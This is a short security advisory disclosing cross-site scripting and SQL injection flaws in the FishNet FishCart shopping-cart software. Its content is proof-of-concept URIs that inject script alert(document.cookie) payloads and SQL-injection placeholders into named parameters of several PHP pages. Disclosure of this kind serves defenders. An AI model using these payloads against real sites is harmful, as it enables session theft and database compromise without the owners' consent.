FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities

FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities

An attacker can exploit these issues through a web client.

The following proof-of-concept URIs are available:

http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku=
http://www.example.com/demo31/upstracking.php?trackingnum='"><script>alert(document.cookie)</script>&reqagree=checked&m=
http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree='"><script>alert(document.cookie)</script>&m=
http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)</script>

http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION
http://www.example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION